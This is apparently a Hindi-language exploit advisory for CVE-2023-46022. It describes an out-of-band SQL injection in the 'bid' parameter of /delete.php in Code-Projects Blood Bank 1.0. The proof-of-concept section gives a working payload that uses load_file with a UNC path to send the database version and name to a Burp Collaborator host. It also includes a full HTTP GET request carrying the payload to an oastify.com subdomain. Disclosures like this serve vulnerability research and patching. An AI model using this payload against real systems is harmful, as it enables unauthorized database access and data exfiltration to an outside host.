CVE-2023-46022-Code-Projects-Blood-Bank-1.0-OOB-SQL-Injection-Vulnerability
- एक्सप्लॉइट लेखक: ersinerenler
विक्रेता होमपेज
सॉफ्टवेयर लिंक
अवलोकन
- Code-Projects Blood Bank V1.0, /delete.php फ़ाइल में 'bid' पैरामीटर के माध्यम से आउट-ऑफ-बैंड (OOB) SQL इंजेक्शन से संबंधित एक गंभीर सुरक्षा भेद्यता के संपर्क में है। यह भेद्यता उचित सुरक्षा तंत्र की कमी के कारण उत्पन्न होती है, जिससे हमलावर पैरामीटर का दुरुपयोग कर सकते हैं और Burp Collaborator के माध्यम से OOB SQL इंजेक्शन हमले कर सकते हैं। इसके परिणामस्वरूप अनधिकृत पहुंच और डेटाबेस से संवेदनशील जानकारी का निष्कर्षण हो सकता है।
भेद्यता विवरण
- CVE आईडी: CVE-2023-46022
- प्रभावित संस्करण: Blood Bank V1.0
- भेद्य फ़ाइल: /delete.php
- पैरामीटर नाम: bid
- हमले का प्रकार: स्थानीय
संदर्भ:
विवरण
- Code-Projects Blood Bank V1.0 के /delete.php फ़ाइल में 'bid' पैरामीटर आउट-ऑफ-बैंड (OOB) SQL इंजेक्शन के प्रति संवेदनशील है। यह भेद्यता अपर्याप्त सुरक्षा तंत्र के कारण उत्पन्न होती है, जिससे हमलावर OOB SQL इंजेक्शन हमले शुरू करने के लिए Burp Collaborator का उपयोग करके पैरामीटर का शोषण कर सकते हैं। इस तकनीक के माध्यम से, एक हमलावर डेटाबेस से संवेदनशील जानकारी निकाल सकता है।
प्रूफ ऑफ कॉन्सेप्ट (PoC) :
- Burp Suite के माध्यम से delete.php के अनुरोध को इंटरसेप्ट करें
- पेलोड को भेद्य पैरामीटर में इंजेक्ट करें
- पेलोड:
3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.collaborator-domain\\a.txt')))%2b'
bid पैरामीटर के लिए उदाहरण अनुरोध
---
GET /bloodbank/file/delete.php?bid=3'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.cuaxacpnxbay7ss8o3csf4bkwb22qtei.oastify.com\\a.txt')))%2b' HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Referer: http://localhost/bloodbank/bloodinfo.php
Cookie: PHPSESSID=<some-cookie-value>
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
---
- डेटाबेस और संस्करण की जानकारी Burp Suite Collaborator के माध्यम से प्राप्त की गई
